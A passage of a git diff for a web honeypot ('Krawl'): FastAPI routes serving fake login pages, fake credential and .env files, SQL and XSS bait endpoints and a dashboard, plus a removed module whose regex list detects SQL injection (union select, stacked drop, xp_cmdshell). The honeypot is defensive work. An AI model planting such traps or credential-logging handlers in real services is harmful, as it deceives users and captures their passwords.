content={"error": "Raw request not found"}, status_code=404 + ) + return JSONResponse(content={"raw_request": raw}, headers=_no_cache_headers()) + except Exception as e: + get_app_logger().error(f"Error fetching raw request: {e}") + return JSONResponse(content={"error": str(e)}, status_code=500) + + +@router.get("/api/get_banlist") +async def get_banlist(request: Request, fwtype: str = Query("iptables")): + config = request.app.state.config + + filename = f"{fwtype}_banlist.txt" + if fwtype == "raw": + filename = "malicious_ips.txt" + + file_path = os.path.join(config.exports_path, filename) + + try: + if os.path.exists(file_path): + with open(file_path, "rb") as f: + content = f.read() + return Response( + content=content, + status_code=200, + media_type="text/plain", + headers={ + "Content-Disposition": f'attachment; filename="{filename}"', + "Content-Length": str(len(content)), + }, + ) + else: + return PlainTextResponse("File not found", status_code=404) + except Exception as e: + get_app_logger().error(f"Error serving malicious IPs file: {e}") + return PlainTextResponse("Internal server error", status_code=500) + + +@router.get("/api/download/malicious_ips.txt") +async def download_malicious_ips(request: Request): + config = request.app.state.config + file_path = os.path.join(config.exports_path, "malicious_ips.txt") + + try: + if os.path.exists(file_path): + with open(file_path, "rb") as f: + content = f.read() + return Response( + content=content, + status_code=200, + media_type="text/plain", + headers={ + "Content-Disposition": 'attachment; filename="malicious_ips.txt"', + "Content-Length": str(len(content)), + }, + ) + else: + return PlainTextResponse("File not found", status_code=404) + except Exception as e: + get_app_logger().error(f"Error serving malicious IPs file: {e}") + return PlainTextResponse("Internal server error", status_code=500) diff --git a/src/routes/dashboard.py b/src/routes/dashboard.py new file mode 100644 index 0000000..081336c --- 
/dev/null +++ b/src/routes/dashboard.py @@ -0,0 +1,74 @@ +#!/usr/bin/env python3 + +""" +Dashboard page route. +Renders the main dashboard page with server-side data for initial load. +""" + +from fastapi import APIRouter, Request +from fastapi.responses import JSONResponse +from logger import get_app_logger + +from dependencies import get_db, get_templates + +router = APIRouter() + + +@router.get("") +@router.get("/") +async def dashboard_page(request: Request): + db = get_db() + config = request.app.state.config + dashboard_path = "/" + config.dashboard_secret_path.lstrip("/") + + # Get initial data for server-rendered sections + stats = db.get_dashboard_counts() + suspicious = db.get_recent_suspicious(limit=10) + + # Get credential count for the stats card + cred_result = db.get_credentials_paginated(page=1, page_size=1) + stats["credential_count"] = cred_result["pagination"]["total"] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/index.html", + { + "request": request, + "dashboard_path": dashboard_path, + "stats": stats, + "suspicious_activities": suspicious, + }, + ) + + +@router.get("/ip/{ip_address:path}") +async def ip_page(ip_address: str, request: Request): + db = get_db() + try: + stats = db.get_ip_stats_by_ip(ip_address) + config = request.app.state.config + dashboard_path = "/" + config.dashboard_secret_path.lstrip("/") + + if stats: + # Transform fields for template compatibility + list_on = stats.get("list_on") or {} + stats["blocklist_memberships"] = list(list_on.keys()) if list_on else [] + stats["reverse_dns"] = stats.get("reverse") + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/ip.html", + { + "request": request, + "dashboard_path": dashboard_path, + "stats": stats, + "ip_address": ip_address, + }, + ) + else: + return JSONResponse( + content={"error": "IP not found"}, + ) + except Exception as e: + get_app_logger().error(f"Error fetching IP stats: {e}") + return 
JSONResponse(content={"error": str(e)}) diff --git a/src/routes/honeypot.py b/src/routes/honeypot.py new file mode 100644 index 0000000..e4b384c --- /dev/null +++ b/src/routes/honeypot.py @@ -0,0 +1,500 @@ +#!/usr/bin/env python3 + +""" +Honeypot trap routes for the Krawl deception server. +Migrated from handler.py serve_special_path(), do_POST(), and do_GET() catch-all. +""" + +import asyncio +import random +import time +from datetime import datetime +from urllib.parse import urlparse, parse_qs, unquote_plus + +from fastapi import APIRouter, Request, Response, Depends +from fastapi.responses import HTMLResponse, PlainTextResponse, JSONResponse + +from dependencies import ( + get_tracker, + get_app_config, + get_client_ip, + build_raw_request, +) +from config import Config +from tracker import AccessTracker +from templates import html_templates +from generators import ( + credentials_txt, + passwords_txt, + users_json, + api_keys_json, + api_response, + directory_listing, +) +from deception_responses import ( + generate_sql_error_response, + get_sql_response_with_data, + detect_xss_pattern, + generate_xss_response, + generate_server_error, +) +from wordlists import get_wordlists +from logger import get_app_logger, get_access_logger, get_credential_logger + +# --- Auto-tracking dependency --- +# Records requests that match attack patterns or honeypot trap paths. 
+ + +async def _track_honeypot_request(request: Request): + """Record access for requests with attack patterns or honeypot path hits.""" + tracker = request.app.state.tracker + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + path = request.url.path + + body = "" + if request.method in ("POST", "PUT"): + body_bytes = await request.body() + body = body_bytes.decode("utf-8", errors="replace") + + # Check attack patterns in path and body + attack_findings = tracker.detect_attack_type(path) + + if body: + import urllib.parse + + decoded_body = urllib.parse.unquote(body) + attack_findings.extend(tracker.detect_attack_type(decoded_body)) + + # Record if attack pattern detected OR path is a honeypot trap + if attack_findings or tracker.is_honeypot_path(path): + tracker.record_access( + ip=client_ip, + path=path, + user_agent=user_agent, + body=body, + method=request.method, + raw_request=build_raw_request(request, body), + ) + + +router = APIRouter(dependencies=[Depends(_track_honeypot_request)]) + + +# --- Helper functions --- + + +def _should_return_error(config: Config) -> bool: + if config.probability_error_codes <= 0: + return False + return random.randint(1, 100) <= config.probability_error_codes + + +def _get_random_error_code() -> int: + wl = get_wordlists() + error_codes = wl.error_codes + if not error_codes: + error_codes = [400, 401, 403, 404, 500, 502, 503] + return random.choice(error_codes) + + +# --- HEAD --- + + +@router.head("/{path:path}") +async def handle_head(path: str): + return Response(status_code=200, headers={"Content-Type": "text/html"}) + + +# --- POST routes --- + + +@router.post("/api/search") +@router.post("/api/sql") +@router.post("/api/database") +async def sql_endpoint_post(request: Request): + client_ip = get_client_ip(request) + access_logger = get_access_logger() + + body_bytes = await request.body() + post_data = body_bytes.decode("utf-8", errors="replace") + + base_path = request.url.path + 
access_logger.info( + f"[SQL ENDPOINT POST] {client_ip} - {base_path} - Data: {post_data[:100] if post_data else 'empty'}" + ) + + error_msg, content_type, status_code = generate_sql_error_response(post_data) + + if error_msg: + access_logger.warning( + f"[SQL INJECTION DETECTED POST] {client_ip} - {base_path}" + ) + return Response( + content=error_msg, status_code=status_code, media_type=content_type + ) + else: + response_data = get_sql_response_with_data(base_path, post_data) + return Response( + content=response_data, status_code=200, media_type="application/json" + ) + + +@router.post("/api/contact") +async def contact_post(request: Request): + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + tracker = request.app.state.tracker + access_logger = get_access_logger() + app_logger = get_app_logger() + + body_bytes = await request.body() + post_data = body_bytes.decode("utf-8", errors="replace") + + parsed_data = {} + if post_data: + parsed_qs = parse_qs(post_data) + parsed_data = {k: v[0] if v else "" for k, v in parsed_qs.items()} + + xss_detected = any(detect_xss_pattern(str(v)) for v in parsed_data.values()) + + if xss_detected: + access_logger.warning( + f"[XSS ATTEMPT DETECTED] {client_ip} - {request.url.path} - Data: {post_data[:200]}" + ) + else: + access_logger.info(f"[XSS ENDPOINT POST] {client_ip} - {request.url.path}") + + response_html = generate_xss_response(parsed_data) + return HTMLResponse(content=response_html, status_code=200) + + +@router.post("/{path:path}") +async def credential_capture_post(request: Request, path: str): + """Catch-all POST handler for credential capture.""" + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + tracker = request.app.state.tracker + access_logger = get_access_logger() + credential_logger = get_credential_logger() + + body_bytes = await request.body() + post_data = body_bytes.decode("utf-8", errors="replace") + + full_path = 
f"/{path}" + + access_logger.warning( + f"[LOGIN ATTEMPT] {client_ip} - {full_path} - {user_agent[:50]}" + ) + + if post_data: + access_logger.warning(f"[POST DATA] {post_data[:200]}") + + username, password = tracker.parse_credentials(post_data) + if username or password: + timestamp = datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ") + credential_line = f"{timestamp}|{client_ip}|{username or 'N/A'}|{password or 'N/A'}|{full_path}" + credential_logger.info(credential_line) + + tracker.record_credential_attempt( + client_ip, full_path, username or "N/A", password or "N/A" + ) + + access_logger.warning( + f"[CREDENTIALS CAPTURED] {client_ip} - Username: {username or 'N/A'} - Path: {full_path}" + ) + + await asyncio.sleep(1) + return HTMLResponse(content=html_templates.login_error(), status_code=200) + + +# --- GET special paths --- + + +@router.get("/robots.txt") +async def robots_txt(): + return PlainTextResponse(html_templates.robots_txt()) + + +@router.get("/credentials.txt") +async def fake_credentials(): + return PlainTextResponse(credentials_txt()) + + +@router.get("/passwords.txt") +@router.get("/admin_notes.txt") +async def fake_passwords(): + return PlainTextResponse(passwords_txt()) + + +@router.get("/users.json") +async def fake_users_json(): + return JSONResponse(content=None, status_code=200, media_type="application/json") + + +@router.get("/api_keys.json") +async def fake_api_keys(): + return Response( + content=api_keys_json(), status_code=200, media_type="application/json" + ) + + +@router.get("/config.json") +async def fake_config_json(): + return Response( + content=api_response("/api/config"), + status_code=200, + media_type="application/json", + ) + + +# Override the generic /users.json to return actual content +@router.get("/users.json", include_in_schema=False) +async def fake_users_json_content(): + return Response( + content=users_json(), status_code=200, media_type="application/json" + ) + + +@router.get("/admin") +@router.get("/admin/") 
+@router.get("/admin/login") +@router.get("/login") +async def fake_login(): + return HTMLResponse(html_templates.login_form()) + + +@router.get("/users") +@router.get("/user") +@router.get("/database") +@router.get("/db") +@router.get("/search") +async def fake_product_search(): + return HTMLResponse(html_templates.product_search()) + + +@router.get("/info") +@router.get("/input") +@router.get("/contact") +@router.get("/feedback") +@router.get("/comment") +async def fake_input_form(): + return HTMLResponse(html_templates.input_form()) + + +@router.get("/server") +async def fake_server_error(): + error_html, content_type = generate_server_error() + return Response(content=error_html, status_code=500, media_type=content_type) + + +@router.get("/wp-login.php") +@router.get("/wp-login") +@router.get("/wp-admin") +@router.get("/wp-admin/") +async def fake_wp_login(): + return HTMLResponse(html_templates.wp_login()) + + +@router.get("/wp-content/{path:path}") +@router.get("/wp-includes/{path:path}") +async def fake_wordpress(path: str = ""): + return HTMLResponse(html_templates.wordpress()) + + +@router.get("/phpmyadmin") +@router.get("/phpmyadmin/{path:path}") +@router.get("/phpMyAdmin") +@router.get("/phpMyAdmin/{path:path}") +@router.get("/pma") +@router.get("/pma/") +async def fake_phpmyadmin(path: str = ""): + return HTMLResponse(html_templates.phpmyadmin()) + + +@router.get("/.env") +async def fake_env(): + return Response( + content=api_response("/.env"), status_code=200, media_type="application/json" + ) + + +@router.get("/backup/") +@router.get("/uploads/") +@router.get("/private/") +@router.get("/config/") +@router.get("/database/") +async def fake_directory_listing(request: Request): + return HTMLResponse(directory_listing(request.url.path)) + + +# --- SQL injection honeypot GET endpoints --- + + +@router.get("/api/search") +@router.get("/api/sql") +@router.get("/api/database") +async def sql_endpoint_get(request: Request): + client_ip = 
get_client_ip(request) + access_logger = get_access_logger() + app_logger = get_app_logger() + + base_path = request.url.path + request_query = request.url.query or "" + + error_msg, content_type, status_code = generate_sql_error_response(request_query) + + if error_msg: + access_logger.warning( + f"[SQL INJECTION DETECTED] {client_ip} - {base_path} - Query: {request_query[:100] if request_query else 'empty'}" + ) + return Response( + content=error_msg, status_code=status_code, media_type=content_type + ) + else: + access_logger.info( + f"[SQL ENDPOINT] {client_ip} - {base_path} - Query: {request_query[:100] if request_query else 'empty'}" + ) + response_data = get_sql_response_with_data(base_path, request_query) + return Response( + content=response_data, status_code=200, media_type="application/json" + ) + + +# --- Generic /api/* fake endpoints --- + + +@router.get("/api/{path:path}") +async def fake_api_catchall(request: Request, path: str): + full_path = f"/api/{path}" + return Response( + content=api_response(full_path), status_code=200, media_type="application/json" + ) + + +# --- Catch-all GET (trap pages with random links) --- +# This MUST be registered last in the router + + +@router.get("/{path:path}") +async def trap_page(request: Request, path: str): + """Generate trap page with random links. 
This is the catch-all route.""" + config = request.app.state.config + tracker = request.app.state.tracker + app_logger = get_app_logger() + access_logger = get_access_logger() + + client_ip = get_client_ip(request) + user_agent = request.headers.get("User-Agent", "") + full_path = f"/{path}" if path else "/" + + # Check wordpress-like paths + if "wordpress" in full_path.lower(): + return HTMLResponse(html_templates.wordpress()) + + is_suspicious = tracker.is_suspicious_user_agent(user_agent) + + if is_suspicious: + access_logger.warning( + f"[SUSPICIOUS] {client_ip} - {user_agent[:50]} - {full_path}" + ) + else: + access_logger.info(f"[REQUEST] {client_ip} - {full_path}") + + # Record access unless the router dependency already handled it + # (attack pattern or honeypot path → already recorded by _track_honeypot_request) + if not tracker.detect_attack_type(full_path) and not tracker.is_honeypot_path( + full_path + ): + tracker.record_access( + ip=client_ip, + path=full_path, + user_agent=user_agent, + method=request.method, + raw_request=build_raw_request(request) if is_suspicious else "", + ) + + # Random error response + if _should_return_error(config): + error_code = _get_random_error_code() + access_logger.info(f"Returning error {error_code} to {client_ip} - {full_path}") + return Response(status_code=error_code) + + # Response delay + await asyncio.sleep(config.delay / 1000.0) + + # Increment page visit counter + current_visit_count = tracker.increment_page_visit(client_ip) + + # Generate page + page_html = _generate_page( + config, tracker, client_ip, full_path, current_visit_count, request.app + ) + + # Decrement canary counter + request.app.state.counter -= 1 + if request.app.state.counter < 0: + request.app.state.counter = config.canary_token_tries + + return HTMLResponse(content=page_html, status_code=200) + + +def _generate_page(config, tracker, client_ip, seed, page_visit_count, app) -> str: + """Generate a webpage containing random links or canary 
token.""" + random.seed(seed) + + ip_category = tracker.get_category_by_ip(client_ip) + + should_apply_crawler_limit = False + if config.infinite_pages_for_malicious: + if ( + ip_category == "good_crawler" or ip_category == "regular_user" + ) and page_visit_count >= config.max_pages_limit: + should_apply_crawler_limit = True + else: + if ( + ip_category == "good_crawler" + or ip_category == "bad_crawler" + or ip_category == "attacker" + ) and page_visit_count >= config.max_pages_limit: + should_apply_crawler_limit = True + + if should_apply_crawler_limit: + return html_templates.main_page( + app.state.counter, "

Crawl limit reached.

" + ) + + num_pages = random.randint(*config.links_per_page_range) + content = "" + + if app.state.counter <= 0 and config.canary_token_url: + content += f""" + +""" + + webpages = app.state.webpages + if webpages is None: + for _ in range(num_pages): + address = "".join( + [ + random.choice(config.char_space) + for _ in range(random.randint(*config.links_length_range)) + ] + ) + content += f""" + +""" + else: + for _ in range(num_pages): + address = random.choice(webpages) + content += f""" + +""" + + return html_templates.main_page(app.state.counter, content) diff --git a/src/routes/htmx.py b/src/routes/htmx.py new file mode 100644 index 0000000..303bce5 --- /dev/null +++ b/src/routes/htmx.py @@ -0,0 +1,407 @@ +#!/usr/bin/env python3 + +""" +HTMX fragment endpoints. +Server-rendered HTML partials for table pagination, sorting, IP details, and search. +""" + +from fastapi import APIRouter, Request, Response, Query + +from dependencies import get_db, get_templates + +router = APIRouter() + + +def _dashboard_path(request: Request) -> str: + config = request.app.state.config + return "/" + config.dashboard_secret_path.lstrip("/") + + +# ── Honeypot Triggers ──────────────────────────────────────────────── + + +@router.get("/htmx/honeypot") +async def htmx_honeypot( + request: Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_honeypot_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/honeypot_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["honeypots"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Top IPs ────────────────────────────────────────────────────────── + + +@router.get("/htmx/top-ips") +async def htmx_top_ips( + request: 
Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_top_ips_paginated( + page=max(1, page), page_size=8, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/top_ips_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["ips"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Top Paths ──────────────────────────────────────────────────────── + + +@router.get("/htmx/top-paths") +async def htmx_top_paths( + request: Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_top_paths_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/top_paths_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["paths"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Top User-Agents ───────────────────────────────────────────────── + + +@router.get("/htmx/top-ua") +async def htmx_top_ua( + request: Request, + page: int = Query(1), + sort_by: str = Query("count"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_top_user_agents_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/top_ua_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["user_agents"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Attackers 
──────────────────────────────────────────────────────── + + +@router.get("/htmx/attackers") +async def htmx_attackers( + request: Request, + page: int = Query(1), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_attackers_paginated( + page=max(1, page), page_size=25, sort_by=sort_by, sort_order=sort_order + ) + + # Normalize pagination key (DB returns total_attackers, template expects total) + pagination = result["pagination"] + if "total_attackers" in pagination and "total" not in pagination: + pagination["total"] = pagination["total_attackers"] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/attackers_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["attackers"], + "pagination": pagination, + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Access logs by ip ──────────────────────────────────────────────────────── + + +@router.get("/htmx/access-logs") +async def htmx_access_logs_by_ip( + request: Request, + page: int = Query(1), + sort_by: str = Query("total_requests"), + sort_order: str = Query("desc"), + ip_filter: str = Query("ip_filter"), +): + db = get_db() + result = db.get_access_logs_paginated( + page=max(1, page), page_size=25, ip_filter=ip_filter + ) + + # Normalize pagination key (DB returns total_attackers, template expects total) + pagination = result["pagination"] + if "total_access_logs" in pagination and "total" not in pagination: + pagination["total"] = pagination["total_access_logs"] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/access_by_ip_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["access_logs"], + "pagination": pagination, + "sort_by": sort_by, + "sort_order": sort_order, + "ip_filter": ip_filter, + }, + ) + + +# ── Credentials 
────────────────────────────────────────────────────── + + +@router.get("/htmx/credentials") +async def htmx_credentials( + request: Request, + page: int = Query(1), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), +): + db = get_db() + result = db.get_credentials_paginated( + page=max(1, page), page_size=5, sort_by=sort_by, sort_order=sort_order + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/credentials_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": result["credentials"], + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + }, + ) + + +# ── Attack Types ───────────────────────────────────────────────────── + + +@router.get("/htmx/attacks") +async def htmx_attacks( + request: Request, + page: int = Query(1), + sort_by: str = Query("timestamp"), + sort_order: str = Query("desc"), + ip_filter: str = Query(None), +): + db = get_db() + result = db.get_attack_types_paginated( + page=max(1, page), + page_size=5, + sort_by=sort_by, + sort_order=sort_order, + ip_filter=ip_filter, + ) + + # Transform attack data for template (join attack_types list, map id to log_id) + items = [] + for attack in result["attacks"]: + items.append( + { + "ip": attack["ip"], + "path": attack["path"], + "attack_type": ", ".join(attack.get("attack_types", [])), + "user_agent": attack.get("user_agent", ""), + "timestamp": attack.get("timestamp"), + "log_id": attack.get("id"), + } + ) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/attack_types_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": items, + "pagination": result["pagination"], + "sort_by": sort_by, + "sort_order": sort_order, + "ip_filter": ip_filter or "", + }, + ) + + +# ── Attack Patterns ────────────────────────────────────────────────── + + +@router.get("/htmx/patterns") +async def 
htmx_patterns( + request: Request, + page: int = Query(1), +): + db = get_db() + page = max(1, page) + page_size = 10 + + # Get all attack type stats and paginate manually + result = db.get_attack_types_stats(limit=100) + all_patterns = [ + {"pattern": item["type"], "count": item["count"]} + for item in result.get("attack_types", []) + ] + + total = len(all_patterns) + total_pages = max(1, (total + page_size - 1) // page_size) + offset = (page - 1) * page_size + items = all_patterns[offset : offset + page_size] + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/patterns_table.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "items": items, + "pagination": { + "page": page, + "page_size": page_size, + "total": total, + "total_pages": total_pages, + }, + }, + ) + + +# ── IP Insight (full IP page as partial) ───────────────────────────── + + +@router.get("/htmx/ip-insight/{ip_address:path}") +async def htmx_ip_insight(ip_address: str, request: Request): + db = get_db() + stats = db.get_ip_stats_by_ip(ip_address) + + if not stats: + stats = {"ip": ip_address, "total_requests": "N/A"} + + # Transform fields for template compatibility + list_on = stats.get("list_on") or {} + stats["blocklist_memberships"] = list(list_on.keys()) if list_on else [] + stats["reverse_dns"] = stats.get("reverse") + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/ip_insight.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "stats": stats, + "ip_address": ip_address, + }, + ) + + +# ── IP Detail ──────────────────────────────────────────────────────── + + +@router.get("/htmx/ip-detail/{ip_address:path}") +async def htmx_ip_detail(ip_address: str, request: Request): + db = get_db() + stats = db.get_ip_stats_by_ip(ip_address) + + if not stats: + stats = {"ip": ip_address, "total_requests": "N/A"} + + # Transform fields for template compatibility + list_on 
= stats.get("list_on") or {} + stats["blocklist_memberships"] = list(list_on.keys()) if list_on else [] + stats["reverse_dns"] = stats.get("reverse") + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/ip_detail.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "stats": stats, + }, + ) + + +# ── Search ─────────────────────────────────────────────────────────── + + +@router.get("/htmx/search") +async def htmx_search( + request: Request, + q: str = Query(""), + page: int = Query(1), +): + q = q.strip() + if not q: + return Response(content="", media_type="text/html") + + db = get_db() + result = db.search_attacks_and_ips(query=q, page=max(1, page), page_size=20) + + templates = get_templates() + return templates.TemplateResponse( + "dashboard/partials/search_results.html", + { + "request": request, + "dashboard_path": _dashboard_path(request), + "attacks": result["attacks"], + "ips": result["ips"], + "query": q, + "pagination": result["pagination"], + }, + ) diff --git a/src/server.py b/src/server.py deleted file mode 100644 index 94f1d1e..0000000 --- a/src/server.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python3 - -""" -Main server module for the deception honeypot. -Run this file to start the server. 
-""" - -import sys -from http.server import HTTPServer - -from config import get_config -from tracker import AccessTracker -from analyzer import Analyzer -from handler import Handler -from logger import ( - initialize_logging, - get_app_logger, - get_access_logger, - get_credential_logger, -) -from database import initialize_database -from tasks_master import get_tasksmaster - - -def print_usage(): - """Print usage information""" - print(f"Usage: {sys.argv[0]} [FILE]\n") - print("FILE is file containing a list of webpage names to serve, one per line.") - print("If no file is provided, random links will be generated.\n") - print("Configuration:") - print(" Configuration is loaded from a YAML file (default: config.yaml)") - print("Set CONFIG_LOCATION environment variable to use a different file.\n") - print("Example config.yaml structure:") - print("server:") - print("port: 5000") - print("delay: 100") - print("links:") - print("min_length: 5") - print("max_length: 15") - print("min_per_page: 10") - print("max_per_page: 15") - print("canary:") - print("token_url: null") - print("token_tries: 10") - print("dashboard:") - print("secret_path: null # auto-generated if not set") - print("database:") - print('path: "data/krawl.db"') - print("retention_days: 30") - print("behavior:") - print("probability_error_codes: 0") - - -def main(): - """Main entry point for the deception server""" - if "-h" in sys.argv or "--help" in sys.argv: - print_usage() - exit(0) - - config = get_config() - - # Initialize logging with timezone - initialize_logging() - app_logger = get_app_logger() - access_logger = get_access_logger() - credential_logger = get_credential_logger() - - # Initialize database for persistent storage - try: - initialize_database(config.database_path) - app_logger.info(f"Database initialized at: {config.database_path}") - except Exception as e: - app_logger.warning( - f"Database initialization failed: {e}. Continuing with in-memory only." 
- ) - - tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds) - analyzer = Analyzer() - - Handler.config = config - Handler.tracker = tracker - Handler.analyzer = analyzer - Handler.counter = config.canary_token_tries - Handler.app_logger = app_logger - Handler.access_logger = access_logger - Handler.credential_logger = credential_logger - - if len(sys.argv) == 2: - try: - with open(sys.argv[1], "r") as f: - Handler.webpages = f.readlines() - - if not Handler.webpages: - app_logger.warning( - "The file provided was empty. Using randomly generated links." - ) - Handler.webpages = None - except IOError: - app_logger.warning("Can't read input file. Using randomly generated links.") - - # tasks master init - tasks_master = get_tasksmaster() - tasks_master.run_scheduled_tasks() - - try: - - banner = f""" - -============================================================ -DASHBOARD AVAILABLE AT -{config.dashboard_secret_path} -============================================================ - """ - app_logger.info(banner) - app_logger.info(f"Starting deception server on port {config.port}...") - if config.canary_token_url: - app_logger.info( - f"Canary token will appear after {config.canary_token_tries} tries" - ) - else: - app_logger.info( - "No canary token configured (set CANARY_TOKEN_URL to enable)" - ) - - server = HTTPServer(("0.0.0.0", config.port), Handler) - app_logger.info("Server started. Use to stop.") - server.serve_forever() - except KeyboardInterrupt: - app_logger.info("Stopping server...") - server.socket.close() - app_logger.info("Server stopped") - except Exception as e: - app_logger.error(f"Error starting HTTP server on port {config.port}: {e}") - app_logger.error( - f"Make sure you are root, if needed, and that port {config.port} is open." 
- ) - exit(1) - - -if __name__ == "__main__": - main() diff --git a/src/server_errors.py b/src/server_errors.py deleted file mode 100644 index 7b55654..0000000 --- a/src/server_errors.py +++ /dev/null @@ -1,65 +0,0 @@ -#!/usr/bin/env python3 - -import random -from wordlists import get_wordlists - - -def generate_server_error() -> tuple[str, str]: - wl = get_wordlists() - server_errors = wl.server_errors - - if not server_errors: - return ("500 Internal Server Error", "text/html") - - server_type = random.choice(list(server_errors.keys())) - server_config = server_errors[server_type] - - error_codes = { - 400: "Bad Request", - 401: "Unauthorized", - 403: "Forbidden", - 404: "Not Found", - 500: "Internal Server Error", - 502: "Bad Gateway", - 503: "Service Unavailable", - } - - code = random.choice(list(error_codes.keys())) - message = error_codes[code] - - template = server_config.get("template", "") - version = random.choice(server_config.get("versions", ["1.0"])) - - html = template.replace("{code}", str(code)) - html = html.replace("{message}", message) - html = html.replace("{version}", version) - - if server_type == "apache": - os = random.choice(server_config.get("os", ["Ubuntu"])) - html = html.replace("{os}", os) - html = html.replace("{host}", "localhost") - - return (html, "text/html") - - -def get_server_header(server_type: str = None) -> str: - wl = get_wordlists() - server_errors = wl.server_errors - - if not server_errors: - return "nginx/1.18.0" - - if not server_type: - server_type = random.choice(list(server_errors.keys())) - - server_config = server_errors.get(server_type, {}) - version = random.choice(server_config.get("versions", ["1.0"])) - - server_headers = { - "nginx": f"nginx/{version}", - "apache": f"Apache/{version}", - "iis": f"Microsoft-IIS/{version}", - "tomcat": f"Apache-Coyote/1.1", - } - - return server_headers.get(server_type, "nginx/1.18.0") diff --git a/src/sql_errors.py b/src/sql_errors.py deleted file mode 100644 index 
583f7ed..0000000 --- a/src/sql_errors.py +++ /dev/null @@ -1,115 +0,0 @@ -#!/usr/bin/env python3 - -import random -import re -from typing import Optional, Tuple -from wordlists import get_wordlists - - -def detect_sql_injection_pattern(query_string: str) -> Optional[str]: - if not query_string: - return None - - query_lower = query_string.lower() - - patterns = { - "quote": [r"'", r'"', r"`"], - "comment": [r"--", r"#", r"/\*", r"\*/"], - "union": [r"\bunion\b", r"\bunion\s+select\b"], - "boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"], - "time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"], - "stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"], - "command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"], - "info_schema": [r"information_schema", r"table_schema", r"table_name"], - } - - for injection_type, pattern_list in patterns.items(): - for pattern in pattern_list: - if re.search(pattern, query_lower): - return injection_type - - return None - - -def get_random_sql_error( - db_type: str = None, injection_type: str = None -) -> Tuple[str, str]: - wl = get_wordlists() - sql_errors = wl.sql_errors - - if not sql_errors: - return ("Database error occurred", "text/plain") - - if not db_type: - db_type = random.choice(list(sql_errors.keys())) - - db_errors = sql_errors.get(db_type, {}) - - if injection_type and injection_type in db_errors: - errors = db_errors[injection_type] - elif "generic" in db_errors: - errors = db_errors["generic"] - else: - all_errors = [] - for error_list in db_errors.values(): - if isinstance(error_list, list): - all_errors.extend(error_list) - errors = all_errors if all_errors else ["Database error occurred"] - - error_message = random.choice(errors) if errors else "Database error occurred" - - if "{table}" in error_message: - tables = ["users", "products", "orders", "customers", "accounts", "sessions"] - error_message = error_message.replace("{table}", 
random.choice(tables)) - - if "{column}" in error_message: - columns = ["id", "name", "email", "password", "username", "created_at"] - error_message = error_message.replace("{column}", random.choice(columns)) - - return (error_message, "text/plain") - - -def generate_sql_error_response( - query_string: str, db_type: str = None -) -> Tuple[str, str, int]: - injection_type = detect_sql_injection_pattern(query_string) - - if not injection_type: - return (None, None, None) - - error_message, content_type = get_random_sql_error(db_type, injection_type) - - status_code = 500 - - if random.random() < 0.3: - status_code = 200 - - return (error_message, content_type, status_code) - - -def get_sql_response_with_data(path: str, params: str) -> str: - import json - from generators import random_username, random_email, random_password - - injection_type = detect_sql_injection_pattern(params) - - if injection_type in ["union", "boolean", "stacked"]: - data = { - "success": True, - "results": [ - { - "id": i, - "username": random_username(), - "email": random_email(), - "password_hash": random_password(), - "role": random.choice(["admin", "user", "moderator"]), - } - for i in range(1, random.randint(2, 5)) - ], - } - return 